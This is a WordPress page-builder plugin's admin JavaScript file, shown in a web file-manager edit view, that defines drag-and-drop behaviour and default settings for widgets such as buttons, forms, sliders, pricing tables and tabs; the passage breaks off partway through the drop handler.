File manager - Edit - /home/adiance/public_html/wp-content/plugins/page-builder-add/admin/scripts/pbb-drag-n-drop.js
Back
(function ($) { // Column Widgets drag/drop $(function () { try { // statements $(".wdt-draggable").draggable({ revert: true, cursor: "move", appendTo: "#container", helper: function () { innerHTMLOfDraggedEl = $(this).html(); helperel = $( '<div class="widgetDragHelper" style=" width:110px;padding: 5px 0px; background: rgb(236 245 252); border-radius: 5px; z-index:9998; border:1px dashed #a7bad3; text-align:center"> ' + innerHTMLOfDraggedEl + " </div>" ); return helperel; }, stop: function () { $(".droppableBelowWidget").css("display", "none"); }, start: function (event, ui) { console.log(ui); $(this).draggable("instance").offset.click = { left: Math.floor(ui.helper.width() / 2) + 15, top: Math.floor(ui.helper.height() / 2) + 15, }; pageBuilderApp.isDefaultWidget = true; currentWidgetType = $(event.target).attr("data-type"); switch (currentWidgetType) { case "wigt-WYSIWYG": thisWidgetAttr = "widgetWYSIWYG"; thisWidgetAttrValues = { widgetContent: "<h2>Add some text, Image or anything you like :)</h2>", }; break; case "wigt-img": thisWidgetAttr = "widgetImg"; var thisWidgetAttrValues = { imgUrl: pluginURL + "/images/dashboard/placeholder.jpg", imgSize: "medium", imgAlignment: "center", imgSizeCustomWidth: "", imgSizeCustomHeight: "", imgLightBox: "false", }; break; case "wigt-menu": thisWidgetAttr = "widgetMenu"; var thisWidgetAttrValues = { menuName: "Select", menuStyle: "menu-style-1", menuColor: "#333", pbMenuFontFamily: "Select", pbMenuFontHoverColor: "#eee", pbMenuFontHoverBgColor: "#e3e3e3", pbMenuFontSize: "16", }; break; case "wigt-btn-gen": thisWidgetAttr = "widgetButton"; var thisWidgetAttrValues = { btnBgColor: "#699cfc", btnBlankAttr: "_self", btnBorderColor: "#699cfc", btnBorderRadius: "2", btnBorderWidth: "0", btnButtonAlignment: "center", btnButtonFontFamily: "Montserrat", btnClickAction: "openLink", btnFontSize: "17", btnFontSizeMobile: "", btnFontSizeTablet: "", btnHeight: "18", btnHeightMobile: "", btnHeightTablet: "", btnHoverBgColor: "rgb(91, 137, 223)", btnHoverColor: "#fff", btnHoverTextColor: "rgb(255, 255, 255)", btnLink: "#", btnText: "Click Here", btnTextColor: "#fff", btnWidth: "50", btnWidthPercent: "170", btnWidthPercentMobile: "", btnWidthPercentTablet: "", btnWidthUnit: "px", btnWidthUnitMobile: "px", btnWidthUnitTablet: "px", }; break; case "wigt-pb-form": thisWidgetAttr = "widgetSubscribeForm"; thisWidgetAttrValues = { pbFormID: "ulpb_form" + Math.floor(Math.random() * 20000 + 100), formLayout: "stacked", showNameField: "block", successAction: "showMessage", successURL: "", successMessage: "Thanks for subscribing! Please check your email for further instructions.", formBtnText: "Subscribe", formBtnHeight: "20", formBtnWidth: "40", formBtnBgColor: "#d9534f", formBtnColor: "#fff", formBtnHoverBgColor: "#d9534f", formBtnHoverTextColor: "", formBtnFontSize: "16", formBtnBorderWidth: "0", formBtnBorderColor: "#d9534f", formBtnBorderRadius: "5", formBtnFontFamily: "select", formSuccessMessageColor: "#333", formDataSaveType: "database", formDataMailChimpApi: "", formDataMailChimpListId: "", }; break; case "wigt-video": thisWidgetAttr = "widgetVideo"; thisWidgetAttrValues = { videoWebM: "", videoMpfour: "", videoThumb: "", vidAutoPlay: "no", vidLoop: "no", vidControls: "controls", }; break; case "wigt-pb-postSlider": thisWidgetAttr = "widgetPBPostsSlider"; thisWidgetAttrValues = { psAutoplay: "false", psSlideDelay: "1", psSlideLoop: "true", psSlideTransition: "fade", psPostsNumber: "10", psDots: "true", psArrows: "true", psFtrImage: "initial", psFtrImageSize: "medium", psExcerpt: "initial", psReadMore: "none", psMoreLinkText: "Read More", psHeadingSize: "24", psTextAlignment: "center", psBgColor: "#55acef", psTxtColor: "#fff", psHeadingTxtColor: "#fff", psPostType: "post", psPostsOrderBy: "date", psPostsOrder: "Descending", psPostsFilterBy: "none", psFilterValue: " ", }; break; case "wigt-pb-icons": thisWidgetAttr = "widgetIcons"; thisWidgetAttrValues = { pbSelectedIcon: "fas fa-star", pbIcStyle: "none", pbIconSize: "48", pbIconRotation: "0", pbIconColor: "rgb(105, 156, 252)", pbIconLink: "", pbIcBgC: "rgb(237, 237, 237)", pbIcBC: "rgb(237, 237, 237)", pbIcBW: "0", pbIcBR: "5", pbIcSHP: "", pbIcSVP: "", pbIcSDB: "", pbIcSC: "", pbIcHC: "", pbIcHBgC: "", pbIcHAn: "", }; break; case "wigt-pb-counter": thisWidgetAttr = "widgetCounter"; thisWidgetAttrValues = { pbCounterID: "ulpb_counter" + Math.floor(Math.random() * 20000 + 100), counterStartingNumber: "0", counterEndingNumber: "100", counterNumberPrefix: "", counterNumberSuffix: "", counterAnimationTime: "1000", counterTitle: "Cool Counter", counterTextColor: "#333", counterTitleColor: "#333", counterNumberFontSize: "36", counterTitleFontSize: "34", }; break; case "wigt-pb-audio": thisWidgetAttr = "widgetAudio"; thisWidgetAttrValues = { audioOgg: "", audioMpThree: "", audioAutoPlay: "no", audioLoop: "no", audioControls: "controls", }; break; case "wigt-pb-cards": thisWidgetAttr = "widgetCard"; thisWidgetAttrValues = { pbSelectedCardIcon: "fa-archive", pbCardIconSize: "55", pbCardIconRotation: "0", pbCardIconColor: "#545e77", pbCardTitleColor: "#545e77", pbCardTitleSize: "24", pbCardTitleSizeTablet: "", pbCardTitleSizeMobile: "", pbCardDescColor: "#545e77", pbCardDescSize: "16", pbCardDescSizeTablet: "", pbCardDescSizeMobile: "", pbCardTitle: "This is the heading", pbCardDesc: "This is the description", }; break; case "wigt-pb-testimonial": thisWidgetAttr = "widgetTestimonial"; thisWidgetAttrValues = { tsAuthorName: "John Doe", tsJob: "CEO", tsCompanyName: "Example Company", tsTestimonial: "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.", tsUserImg: "", tsImageShape: "0", tsIconColor: "#333", tsIconSize: "45", tsTextColor: "#333", tsTextSize: "14", tsTestimonialColor: "#333", tsTestimonialSize: "18", tsTextAlignment: "center", }; break; case "wigt-pb-shortcode": thisWidgetAttr = "widgetShortCode"; thisWidgetAttrValues = { shortCodeInput: "<h2> Add your shortcode for widget to render it. <h2>", }; break; case "wigt-pb-countdown": thisWidgetAttr = "widgetCowntdown"; thisWidgetAttrValues = { pbCountDownDate: "", pbCountDownHour: "", pbCountDownMinute: "", pbCountDownLabel: "", pbCountDownColor: "#333", pbCountDownLabelColor: "#333", pbCountDownTextSize: "21", pbCountDownTextSizeTablet: "", pbCountDownTextSizeMobile: "", pbCountDownLabelTextSize: "18", pbCountDownLabelTextSizeTablet: "", pbCountDownLabelTextSizeMobile: "", pbCountDownLabelFontFamily: "", pbCountDownNumberFontFamily: "", }; break; case "wigt-pb-imageSlider": thisWidgetAttr = "widgetImageSlider"; thisWidgetAttrValues = { pbSliderImagesURL: { 0: pluginURL + "/images/dashboard/placeholder.jpg", 1: pluginURL + "/images/dashboard/placeholder.jpg", }, pbSliderContent: { 0: { imageSlideHeading: "Enter Headline", imageSlideDesc: "Enter Some Text Here.", imageSlideButtonText: "A Button", imageSlideButtonURL: "#", }, 1: { imageSlideHeading: "Enter Headline", imageSlideDesc: "Enter Some Text Here.", imageSlideButtonText: "A Button", imageSlideButtonURL: "#", }, }, slideHeadingStyles: { slideHeadingColor: "#333", slideHeadingSize: "45", slideHeadingSizeTablet: "", slideHeadingSizeMobile: "", slideHeadingLetterSpacing: "", slideHeadingLetterSpacingTablet: "", slideHeadingLetterSpacingMobile: "", slideHeadingLineHeight: "", slideHeadingLineHeightTablet: "", slideHeadingLineHeightMobile: "", slideHeadingFontFamily: "Arial", slideHeadingBold: "false", slideHeadingItalic: "false", slideHeadingUnderlined: "false", }, slideDescStyles: { slideDescColor: "#333", slideDescSize: "18", slideDescSizeTablet: "", slideDescSizeMobile: "", slideDescLetterSpacing: "", slideDescLetterSpacingTablet: "", slideDescLetterSpacingMobile: "", slideDescLineHeight: "", slideDescLineHeightTablet: "", slideDescLineHeightMobile: "", slideDescFontFamily: "Arial", slideDescBold: "false", slideDescItalic: "false", slideDescUnderlined: "false", }, slideButtonStyles: { slideButtonBtnHeight: "15", slideButtonBtnHeightTablet: "", slideButtonBtnHeightMobile: "", slideButtonBtnWidth: "200", slideButtonBtnWidthTablet: "", slideButtonBtnWidthMobile: "", slideButtonBtnBgColor: "rgba(255,255,255,0)", slideButtonBtnColor: "#333", slideButtonBtnHoverBgColor: "#d9534f", slideButtonBtnHoverTextColor: "#d9534f", slideButtonBtnFontSize: "21", slideButtonBtnFontSizeTablet: "", slideButtonBtnFontSizeMobile: "", slideButtonBtnFontFamily: "Arial", slideButtonBtnFontLetterSpacing: "", slideButtonBtnFontLetterSpacingTablet: "", slideButtonBtnFontLetterSpacingMobile: "", slideButtonBtnBorderWidth: "2", slideButtonBtnBorderColor: "#333", slideButtonBtnBorderRadius: "5", }, pbSliderHeight: "400", pbSliderHeightTablet: "", pbSliderHeightMobile: "", pbSliderHeightUnit: "px", pbSliderHeightUnitTablet: "", pbSliderHeightUnitMobile: "", pbSliderContentBgColor: "transparent", pbSliderAuto: "true", pbSliderDelay: "5000", pbSliderPager: "true", pbSliderNav: "true", pbSliderRandom: "false", pbSliderPause: "false", }; break; case "wigt-pb-progressBar": thisWidgetAttr = "widgetProgressBar"; thisWidgetAttrValues = { pbProgressBarTitle: "Progress Bar", pbProgressBarPrecentage: "65", pbProgressBarDisplayPrecentage: "", pbProgressBarText: "Complete", pbProgressBarTitleColor: "#333", pbProgressBarTextColor: "#fff", pbProgressBarColor: "#434264", pbProgressBarBgColor: "#e3e3e3", pbProgressBarTitleSize: "18", pbProgressBarHeight: "25", pbProgressBarTextSize: "15", pbProgressBarTextFontFamily: "Select", }; break; case "wigt-pb-pricing": thisWidgetAttr = "widgetPricing"; thisWidgetAttrValues = { pbPricingHeaderText: "Single Site License", pbPricingContent: '<span class="elLtWrapped defaultELt"><span class="elLtWrapped defaultELt"> </span></span><p class="elLtWrapped" style="text-align: center; font-size: 22px;"><span style="font-family: helvetica, arial, sans-serif; font-size: 36pt;"><span class="elLtWrapped" style="color: #fd885a; font-size: 75px; font-family: \'Open Sans\'; font-weight: bold;"><span class="elLtWrapped" style="font-size: 35px;">$</span>99<span class="elLtWrapped" style="font-size: 30px; color: #a9a9a9;">/mo</span></span> </span></p><p class="elLtWrapped" style="text-align: center;"><span style="font-family: helvetica, arial, sans-serif; font-size: 36pt;"> </span></p><p class="elLtWrapped" style="text-align: center;"></p><p class="elLtWrapped" style="text-align: center;"></p><div style="text-align: center;"><span class="elLtWrapped"><span style="background-color: transparent; font-size: 18px;"><span class="elLtWrapped" style="line-height: 30px; color: #878787; font-family: Open Sans;">Access to all premium features</span></span><span class="elLtWrapped" style="background-color: transparent; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif;"> </span></span></div><div style="text-align: center;"><span class="elLtWrapped"><span class="elLtWrapped" style="background-color: transparent; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif;"> </span></span></div><div style="text-align: center;"><span class="elLtWrapped"><span class="elLtWrapped" style="background-color: transparent; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif;"><span style="background-color: transparent; font-size: 18px;"><span class="elLtWrapped" style="line-height: 30px; color: #878787; font-family: Open Sans;">Access to 100+ designs</span></span> </span></span></div><div style="text-align: center;"><span class="elLtWrapped"><span class="elLtWrapped" style="background-color: transparent; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif;"><span class="elLtWrapped" style="font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; background-color: transparent;"> </span></span></span></div><div style="text-align: center;"><span class="elLtWrapped"><span class="elLtWrapped" style="background-color: transparent; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif;"><span class="elLtWrapped" style="font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; background-color: transparent;"><span style="background-color: transparent; font-size: 18px;"><span class="elLtWrapped" style="line-height: 30px; color: #878787; font-family: Open Sans;">Unlimited domains</span></span> </span></span></span></div><div style="text-align: center;"><span class="elLtWrapped"><span class="elLtWrapped" style="background-color: transparent; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif;"><span class="elLtWrapped" style="font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; background-color: transparent;"><span class="elLtWrapped" style="font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; background-color: transparent;"> </span></span></span></span></div><div style="text-align: center;"><span class="elLtWrapped"><span class="elLtWrapped" style="background-color: transparent;"><span class="elLtWrapped" style="background-color: transparent;"><span class="elLtWrapped" style="background-color: transparent;"><span class="elLtWrapped" style="background-color: transparent; font-size: 18px;"><span style="color: #878787; font-family: Open Sans;">Charged Monthly</span></span><span class="elLtWrapped" style="font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; background-color: transparent;"> </span></span></span></span></span></div><p class="elLtWrapped" style="text-align: center;"></p><p class="elLtWrapped" style="text-align: center;"></p><div class="ltwFontScript" style="display: none;"></div><div class="ltwFontScript" style="display: none;"></div><div class="ltwFontScript" style="display: none;"></div><div class="ltwFontScript" style="display: none;"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300&display=swap" rel="stylesheet"></div>', pbPricingHeaderTextColor: "#414141", pbPricingHeaderBgColor: "#fff", pbPricingHeaderTextSize: "22", pbPricingBorderWidth: "0", pbPricingBorderColor: "#fff", pbPricingButtonSectionBgColor: "#fff", pricingbtnText: "Purchase", pricingbtnLink: "#", pricingbtnTextColor: "#fff", pricingbtnFontSize: "18", pricingbtnBgColor: "#699cfc", pricingbtnWidth: "70", pricingbtnHeight: "16", pricingbtnHoverBgColor: "#5b89df", pricingbtnBlankAttr: "_blank", pricingbtnBorderColor: "699cfc", pricingbtnBorderWidth: "0", pricingbtnBorderRadius: "2", pricingbtnButtonAlignment: "center", }; break; case "wigt-pb-imgCarousel": thisWidgetAttr = "widgetImgCarousel"; thisWidgetAttrValues = { pbImgCarouselAutoplay: "false", pbImgCarouselDelay: "1", imgCarouselSlideLoop: "true", imgCarouselSlideTransition: "fade", imgCarouselPagination: "false", pbImgCarouselNav: "true", imgCarouselSlidesURL: { 0: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-1@2x.jpg", 1: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-3@2x.jpg", 2: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-4@2x.jpg", 3: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-5@2x.jpg", 4: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/ABOUT-US@2x.jpg", 4: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/OUR-PARTNERS@2x-scaled.jpg", }, }; break; case "wigt-pb-wooCommerceProducts": thisWidgetAttr = "widgetWooPorducts"; thisWidgetAttrValues = { wooProductsColumn: "2", wooProductsCount: "6", wooProductsCategories: "", wooProductsTags: "", wooProductsOrderBy: "date", wooProductsOrder: "asc", }; break; case "wigt-pb-spacer": thisWidgetAttr = "widgetVerticalSpace"; thisWidgetAttrValues = { widgetVerticalSpaceValue: "50", widgetVerticalSpaceValueTablet: "", widgetVerticalSpaceValueMobile: "", }; break; case "wigt-pb-break": thisWidgetAttr = "widgetBreaker"; thisWidgetAttrValues = { widgetBreakerStyle: "solid", widgetBreakerWeight: "5", widgetBreakerColor: "#3a3a3a", widgetBreakerWidth: "50", widgetBreakerAlignment: "center", widgetBreakerSpacing: "15", }; break; case "wigt-pb-anchor": thisWidgetAttr = "widgetAnchor"; thisWidgetAttrValues = { wdtanchorid: "", }; break; case "wigt-pb-iconList": thisWidgetAttr = "widgetIconList"; thisWidgetAttrValues = { iconListComplete: { 0: { iconListItemText: " List Item 1", iconListItemIcon: "fa-check", iconListItemLink: "", iconListItemLinkOpen: "_blank", }, 1: { iconListItemText: " List Item 2", iconListItemIcon: "fa-map-marker", iconListItemLink: "", iconListItemLinkOpen: "_blank", }, 2: { iconListItemText: " List Item 3", iconListItemIcon: "fa-paper-plane", iconListItemLink: "", iconListItemLinkOpen: "_blank", }, }, iconListLineHeight: "25", iconListAlignment: "left", iconListIconSize: "14", iconListIconColor: "#1e73be", iconListTextSize: "18", iconListTextIndent: "15", iconListTextColor: "#1e73be", iconListTextFontFamily: "Arial", iconListItemLinkOpen: "_blank", }; break; case "wigt-pb-formBuilder": thisWidgetAttr = "widgetFormBuilder"; thisWidgetAttrValues = { widgetPbFbFormFeilds: { 0: { fbFieldType: "text", thisFieldOptions: { fbFieldLabel: "First Name", fbFieldPlaceHolder: "First Name", fbFieldRequired: "false", fbFieldWidth: "50", multiOptionFieldValues: "", fbtextareaRows: "5", }, }, 1: { fbFieldType: "text", thisFieldOptions: { fbFieldLabel: "Last Name", fbFieldPlaceHolder: "Last Name", fbFieldRequired: "false", fbFieldWidth: "50", multiOptionFieldValues: "", fbtextareaRows: "5", }, }, 2: { fbFieldType: "email", thisFieldOptions: { fbFieldLabel: "Email", fbFieldPlaceHolder: "Email", fbFieldRequired: "true", fbFieldWidth: "100", multiOptionFieldValues: "", fbtextareaRows: "5", }, }, 3: { fbFieldType: "textarea", thisFieldOptions: { fbFieldLabel: "Message", fbFieldPlaceHolder: "Your Message", fbFieldRequired: "true", fbFieldWidth: "100", multiOptionFieldValues: "", fbtextareaRows: "5", displayFieldsInline: "inline-block", }, }, }, widgetPbFbFormFeildOptions: { formBuilderFieldSize: "medium", formBuilderFieldLabelDisplay: "unset", formBuilderFieldBgColor: "#fff", formBuilderFieldColor: "#888888", formBuilderFieldBorderColor: "#dddddd", formBuilderFieldBorderWidth: "1.3", formBuilderFieldBorderRadius: "2", formBuilderLabelSize: "16", formBuilderLabelColor: "#888888", }, widgetPbFbFormSubmitOptions: { formBuilderBtnText: "Subscribe", formBuilderBtnSize: "medium", formBuilderBtnWidth: "100", formBuilderBtnBgColor: "rgb(105, 156, 252)", formBuilderBtnColor: "#fff", formBuilderBtnHoverBgColor: "rgb(105, 156, 252)", formBuilderBtnHoverTextColor: "rgb(105, 156, 252)", formBuilderBtnFontSize: "21", formBuilderBtnBorderWidth: "0", formBuilderBtnBorderColor: "rgb(105, 156, 252)", formBuilderBtnBorderRadius: "2", formBuilderBtnAlignment: "left", }, widgetPbFbFormEmailOptions: { formEmailformName: "PluginOps Form", formEmailTo: admEMail, formEmailSubject: "PluginOps New Submission", formEmailFromEmail: "formBuilder@pluginops.com", formEmailName: "PluginOps", formEmailFormat: "plain", formSuccessAction: "", formSuccessActionURL: "", formSuccessMessage: "The form was sent successfully!", }, widgetPbFbFormMailChimp: { formBuilderEnableMailChimp: "", formBuilderMCAccountName: "", formBuilderMCApiKey: "", }, }; break; case "wigt-pb-contentSlider": thisWidgetAttr = "widgetcontentSlider"; thisWidgetAttrValues = { optionName:'', }; break; case "wigt-pb-text": thisWidgetAttr = "widgetText"; thisWidgetAttrValues = { widgetTextContent: "Enter your headline text here.", widgetTextAlignment: "left", widgetTextTag: "h2", widgetTextColor: "#333", widgetTextSize: "36", widgetTextFamily: "Lato", widgetTextWeight: "200", widgetTextTransform: "", widgetTextLineHeight: "", widgetTextSpacing: "", widgetTextBold: false, widgetTextItalic: false, widgetTextUnderlined: false, widgetTextSizeTablet: " ", widgetTextSizeMobile: " ", widgetTextLineHeightTablet: " ", widgetTextLineHeightMobile: " ", widgetTextSpacingTablet: " ", widgetTextSpacingMobile: " ", }; break; case "wigt-pb-liveText": thisWidgetAttr = "wLText"; thisWidgetAttrValues = { wltc: '<p style="text-align: left; font-size: 16px; line-height: 1.3em; color: #555;">This is a block of text, Click on this text to start editing or click on edit button to open widget editing panel.</p>', wltfs: "", }; break; case "wigt-pb-embededVideo": thisWidgetAttr = "widgetEmbedVideo"; thisWidgetAttrValues = { widgetEvidVideoType: "youtube", widgetEvidVideoLink: "https://www.youtube.com/watch?v=xbkwUPbRJH8", widgetEvidVideoAutoplay: "false", widgetEvidVideoPlayerControls: "true", widgetEvidVideoTitle: "true", widgetEvidVideoSuggested: "false", widgetEvidImageOverlay: "false", widgetEvidImageUrl: pluginURL + "/images/dashboard/placeholder.jpg", widgetEvidImageIcon: "block", widgetEvidImageLightbox: "false", widgetEvidImageIconColor: "#333", }; break; case "wigt-pb-testimonialCarousel": thisWidgetAttr = "widgetTCarousel"; thisWidgetAttrValues = { tCarOps: { tCarAutoplay: "false", tCarDelay: "3", tCarSlideLoop: "true", tCarSlideTransition: "fade", tCarPagination: "false", tCarNav: "true", tNSlides: "2", }, tCarSlides: { 0: { tct: "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.", tcn: "John Doe", tcj: "CEO, Tech Corps", tcl: "none", tci: pluginURL + "/images/dashboard/placeholder.jpg", }, 1: { tct: "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.", tcn: "John Doe", tcj: "CEO, Tech Corps", tcl: "none", tci: pluginURL + "/images/dashboard/placeholder.jpg", }, }, tDesignOps: { tcic: "#333", tcis: "45", tcist: "", tcism: "", tcntc: "#333", tcntf: "Select", tcnts: "14", tcntst: "", tcntsm: "", tcttc: "#333", tcttf: "Select", tctts: "18", tcttst: "", tcttsm: "", tcca: "center", tcir: "200px", tcisi: "60", }, }; break; case "wigt-pb-poOptins": thisWidgetAttr = "widgetPoOptins"; thisWidgetAttrValues = { widgetOptinId: "Select", }; break; case "wigt-pb-shareThis": thisWidgetAttr = "widgetShareThis"; thisWidgetAttrValues = { wdtstId: "", wdtstbt: "SBI", }; break; case "wigt-pb-navmenu": thisWidgetAttr = "widgetNavBuilder"; thisWidgetAttrValues = { navItems: { 0: { cnilab: "Menu Page 0", cniurl: "#", }, 1: { cnilab: "Menu Page 1", cniurl: "#", }, 2: { cnilab: "Menu Page 2", cniurl: "#", }, 3: { cnilab: "Menu Page 3", cniurl: "#", }, 4: { cnilab: "Menu Page 4", cniurl: "#", }, }, navStyle: { cnsfc: "#333", cnsfhc: "rgb(149, 149, 149)", cnsbc: "rgba(51, 51, 51, 0)", cnshbc: "rgba(51, 51, 51, 0)", cnsnic: "#333", cnsfs: "16", cnsfst: "", cnsfsm: "", cnslg: "5", cnslh: "8", cnsff: "Select", cnslourl: "", cnslos: "Medium", cnslayout: "Horizontal", }, }; break; case "wigt-pb-gallery": thisWidgetAttr = "widgetIGallery"; thisWidgetAttrValues = { gallItems: { 0: { gur: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/FAQS@2x.jpg", gti: "", gca: "", }, 1: { gur: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-1@2x.jpg", gti: "", gca: "", }, 2: { gur: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-2@2x.jpg", gti: "", gca: "", }, 3: { gur: "https://storage.googleapis.com/imagelibrarystorage.pluginops.com/images/uploads/2020/01/Gallery-Image-5@2x.jpg", gti: "", gca: "", }, }, gallStyles: { wgType: "masonry", wgGC: "33", wgGCT: "", wgGCM: "", wgGCG: "", wgISD: "large", wgICW: "", wgICWT: "", wgICWM: "", wgICH: "", wgICHT: "", wgICHM: "", }, }; break; case "wigt-pb-accordion": thisWidgetAttr = "widgetAccordion"; thisWidgetAttrValues = { accordionItems: { 0: { accoTitle: "Title Accordion 1", accContent: "Enter content for accordion here.", }, 1: { accoTitle: "Title Accordion 2", accContent: "Enter content for accordion here.", }, 2: { accoTitle: "Title Accordion 3", accContent: "Enter content for accordion here.", }, }, accordionIcon: { acciClosed: "fas fa-angle-down", acciOpen: "fas fa-angle-up", acciAlign: "left", acciColor: "#333", acciAColor: "#E3E3E3", acciGap: "10", }, accordionSettings: { accoHeight: "content", accoActive: "true", accocborc: "rgb(179, 179, 179)", accocbort: "solid", }, accordionTitle: { acctbg: "#fff", acctabg: "", acctc: "#333", acctac: "#E3E3E3", hgap: "20", vgap: "15", borwt: "1", borwb: "1", borwl: "2", borwr: "2", typography: { ffam: "Arial", fsize: "24", fsizeT: "", fsizeM: "", fsizeu: "px", fsizeuT: "", fsizeuM: "", fwei: "400", ftrans: "", fstyl: "", fdeco: "", flinh: "", flinhT: "", flinhM: "", fletsp: "", fletspT: "", fletspM: "", }, }, accordionContent: { acccbg: "", acccc: "", hgap: "", vgap: "", borwt: "1", borwb: "1", borwl: "2", borwr: "2", typography: { ffam: "Arial", fsize: "", fsizeT: "", fsizeM: "", fsizeu: "px", fsizeuT: "", fsizeuM: "", fwei: "", ftrans: "", fstyl: "", fdeco: "", flinh: "", flinhT: "", flinhM: "", fletsp: "", fletspT: "", fletspM: "", }, }, }; break; case "wigt-pb-tabs": thisWidgetAttr = "widgetTabs"; thisWidgetAttrValues = { tabItems: { 0: { title: "Title Tab 1", icon: "", content: "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. ", }, 1: { title: "Title Tab 2", icon: "", content: "Enter content for tab here. 2", }, 2: { title: "Title Tab 3", icon: "", content: "Enter content for tab here. 3", }, }, tabIcon: { acciPos: "before", acciGap: "10", }, tabSettings: { accoHeight: "content", accoActive: "true", accocborc: "rgb(179, 179, 179)", accocbort: "solid", }, tabTitle: { acctbg: "#f0f0f0", acctabg: "#636363", acctc: "#000", acctac: "#fff", hgap: "15", vgap: "10", borwt: "0.5", borwb: "0.5", borwl: "1", borwr: "1", typography: { ffam: "Open+Sans", fsize: "16", fsizeT: "", fsizeM: "", fsizeu: "px", fsizeuT: "", fsizeuM: "", fwei: "200", ftrans: "", fstyl: "", fdeco: "", flinh: "1", flinhT: "", flinhM: "", fletsp: "", fletspT: "", fletspM: "", }, }, tabContent: { acccbg: "", acccc: "", borwb: "0.5", borwl: "1", borwr: "1", borwt: "0.5", hgap: "5", vgap: "35", typography: { ffam: "Lato", fsize: "14", fsizeT: "", fsizeM: "", fsizeu: "px", fsizeuT: "", fsizeuM: "", fwei: "", ftrans: "", fstyl: "", fdeco: "", flinh: "1", flinhT: "", flinhM: "", fletsp: "", fletspT: "", fletspM: "", }, }, }; break; case "wigt-pb-popupClose": thisWidgetAttr = "widgetClosePopUp"; var thisWidgetAttrValues = { closeBtnText: "I don't want your Offer", closeBtnLink: "#", closeBtnTextColor: "#636363", closeBtnFontSize: "16px", closeBtnFontSizeTablet: "", closeBtnFontSizeMobile: "", closeBtnBgColor: "rgba(0,0,0,0)", closeBtnWidth: "80", closeBtnWidthPercent: "80", closeBtnWidthUnit: "%", closeBtnWidthUnitTablet: "%", closeBtnWidthUnitMobile: "%", closeBtnWidthPercentTablet: "", closeBtnWidthPercentMobile: "", closeBtnHeight: "10", closeBtnHeightTablet: "", closeBtnHeightMobile: "", closeBtnHoverBgColor: "rgba(0,0,0,0)", closeBtnHoverColor: "#333", closeBtnBorderColor: "rgba(0,0,0,0)", closeBtnBorderWidth: "0", closeBtnBorderRadius: "3", closeBtnButtonAlignment: "center", closeBtnButtonFontFamily: "Homemade Apple", closeBtnBold: true, closeBtnItalic: true, closeBtnUnderlined: true, }; break; default: alert("Widget of unknown type"); break; } var globalWidgetAttrs = { widgetType: currentWidgetType, widgetStyling: "/* Custom CSS for widget here. */", widgetMtop: "0", widgetMleft: "0", widgetMbottom: "0", widgetMright: "0", widgetPtop: "0", widgetPleft: "0", widgetPbottom: "0", widgetPright: "0", widgetBgColor: "transparent", widgetAnimation: "none", widgetBorderWidth: "", widgetBorderStyle: "", widgetBorderColor: "", widgetBoxShadowH: "", widgetBoxShadowV: "", widgetBoxShadowBlur: "", widgetBoxShadowColor: "", [thisWidgetAttr]: thisWidgetAttrValues, }; globalWidgetAttrs["widgetType"] = currentWidgetType; $(".draggedWidgetAttributes").val(JSON.stringify(globalWidgetAttrs)); ColcurrentEditableRowID = jQuery(".ColcurrentEditableRowID").val(); currentEditableColId = jQuery(".currentEditableColId").val(); $(".pluginops_column").droppable({ accept: ".wdt-draggable", snap: ".pluginops_column", drop: function (event, ui) { var curr_droppable = 